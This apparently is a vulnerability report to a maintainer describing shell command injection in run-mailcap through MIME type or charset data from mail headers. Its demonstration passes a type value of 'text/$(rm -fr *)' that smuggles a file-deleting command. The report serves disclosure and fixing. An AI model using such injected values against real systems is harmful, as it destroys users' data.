Dear Maintainer,

run-mailcap is vulnerable to shell command injection in its input data.
Specifically, commands can be injected into a MIME type name, a charset name, or
 other data originating from a Content-Type header.
If run-mailcap is used by some mail program or script for mailcap support, then a malicious message can cause the execution of arbitrary shell code just by being displayed.

(Test with --norun, at your own risk.)
-- rule
text/*; /usr/bin/w3m -T %t %s
-- exploit
$ type='text/$(rm -fr *)' # e.g. from a malicious mail header
$ run-mailcap --action=view "$type":filename